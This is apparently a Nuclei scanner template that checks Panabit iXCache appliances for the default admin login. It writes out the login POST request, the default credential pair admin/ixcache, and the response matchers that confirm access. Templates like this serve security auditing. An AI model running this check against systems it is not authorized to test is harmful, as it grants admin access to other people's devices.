漏洞描述
Panabit iXCache default admin login credentials were successful.
id: panabit-ixcache-default-login
info:
name: Panabit iXCache - Default Admin Login
author: ritikchaddha
severity: high
description: Panabit iXCache default admin login credentials were successful.
reference:
- http://forum.panabit.com/thread-10830-1-1.html
metadata:
max-request: 1
tags: default-login,ixcache,panabit,vuln
http:
- raw:
- |
POST /login/userverify.cgi HTTP/1.1
Host: {{Hostname}}
username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- ixcache
matchers-condition: and
matchers:
- type: word
part: body
words:
- "URL=/cgi-bin/monitor.cgi"
- type: status
status:
- 200
# digest: 490a00463044022056fca33935723bb7cf81be185a245c87b1a00884ffe5da328d78ad843a9f21ff022030dc672d0edcb543406f5cfd5ce9d985d6684d8a0df8939cd846916638bf945b:922c64590222798bb761d5b6d8e72950